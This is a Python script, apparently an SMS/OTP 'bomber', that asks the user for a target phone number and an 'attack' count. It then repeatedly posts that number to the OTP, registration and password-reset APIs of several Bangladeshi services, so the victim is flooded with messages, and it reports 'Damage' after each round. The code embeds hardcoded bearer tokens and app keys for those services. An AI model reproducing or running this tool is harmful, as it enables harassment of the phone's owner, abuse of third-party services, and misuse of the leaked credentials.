import requests
from requests.structures import CaseInsensitiveDict

# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")


print ("""


   ╔═════════════════════════════════╗
   ║ AuTHor   : SHaKiiB ツ           ║
   ║ FaCeBooK : iTzSHaKiiB           ║
   ║ GitHuB   : iTzSHaKiB            ║
   ╚═════════════════════════════════╝




""")


green = '\033[1;32m'
end = '\033[0m'
print (green+"""d888888b d888888b d88888D      .d8888.  .d8b.     d88b    d88b  .d8b.  d8888b. 
  `88'   `~~88~~' YP  d8'      88'  YP d8' `8b    `8P'    `8P' d8' `8b 88  `8D 
   88       88       d8'       `8bo.   88ooo88     88      88  88ooo88 88   88 
   88       88      d8'          `Y8b. 88~~~88     88      88  88~~~88 88   88 
  .88.      88     d8' db      db   8D 88   88 db. 88  db. 88  88   88 88  .8D 
Y888888P    YP    d88888P      `8888Y' YP   YP Y8888P  Y8888P  YP   YP Y8888D' 
                                                                               
"""+end)

# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

print ("	 -!-!- WeLcOmE-!-!- ( SaJJaD  ) ")


number  = str(input("[>] Heii Sir.... apNar aTTack NumBer DiN: "))


amount = int(input("[>] Sir.... apNar aTTack ar PoriMaN LikHuN: "))

url2 = "http://api.myguardianbd.com:80/api/requestOtp"

headers2 = CaseInsensitiveDict()
headers2["Content-Type"] = "application/x-www-form-urlencoded"

headers2["Authorization"] = "Bearer ef9d4e34ba990125803cef38460d2d3fa86db5691397013f03fca316c3705090f27125f4e4cf34ef7921f2862023881ab4c3"

data2 = "new=1&device_id=40d4801634a656ee&mobile="+number

url4 = "https://green-delta.com/api/api.php?action=userRegistrationForm"

headers4 = CaseInsensitiveDict()
headers4["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"

data4 = "firstname=KiinG&lastname=OF+GhOsT&userphone="+number+"&useremail=mdsimohoncircleking%40gmail.com&usernid=2155464684048&date_of_birth=2022-03-31&userpassword=mmmmmm&userconfirmpassword=mmmmmm&useRegistration=Registration"

url5 = "http://nesco.sslwireless.com:80/api/v1/login"

headers5 = CaseInsensitiveDict()
headers5["Content-Type"] = "application/x-www-form-urlencoded"

data5 = "phone_number="+number


url = "https://rootsedulive.com/api/auth/register"

headers = CaseInsensitiveDict()
headers["Content-Type"] = "application/json"


data = '{"name":"ghostofkiing@gmail.com","phone":"88'+number+'","email":"ghostofkiing@gmail.com","password":"mmmmmmmm","confirmPassword":"mmmmmmmm"}'

url7 = "https://rootsedulive.com/api/auth/forget-password"

headers7 = CaseInsensitiveDict()
headers7["Content-Type"] = "application/json"

data7 = '{"phoneOrEmail":"88'+number+'"}'

url11 = "https://prodapi.swap.com.bd/api/v1/send-otp/login"

headers11 = CaseInsensitiveDict()

headers11["X-Authorization"]= "QoFN68MGTcosJxSmDf5GCgxXlNcgE1mUH9MUWuDHgs7dugjR7P2ziASzpo3frHL3"

headers11["Content-Type"] = "application/json;charset=utf-8"

data11 = '{"mobile_number":"'+number+'","referral":false}'

url13 = "https://circle.robi.com.bd/mylife/appapi/appcall.php?op=getOTC&pin=13001&app_version=79&msisdn=88"+number

headers13 = CaseInsensitiveDict()
headers13["x-app-key"] = "000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"
headers13["User-Agent"]="gzip"

url15 = "http://27.131.15.19/lstyle/api/lsotprequest"

headers15 = CaseInsensitiveDict()

headers15["Content-Length"]="48"

headers15["Content-Type"]="application/json"

data15 = """{
  \"shortcode\": \"2494905\",
  \"msisdn\": \"88"""+number+"""\"
}"""


for i in range(amount):
	try:
		
		resp2 = requests.post(url2, headers=headers2, data=data2)
		
		resp = requests.post(url, headers=headers, data=data)
		
		resp4 = requests.post(url4, headers=headers4, data=data4)
		
		resp5= requests.post(url5, headers=headers5,  data=data5)
		
		resp7 = requests.post(url7, headers=headers7,  data=data7)
		
		resp11 = requests.post(url11, headers=headers11, data=data11)
		
		resp15 = requests.post(url15, headers=headers15, data=data15)
		
		resp13 = requests.post(url13, headers=headers13)
		

		print(str (i+1)+" Damage \n")

	except:
		print ("Please Make Sure Your Internet Connection")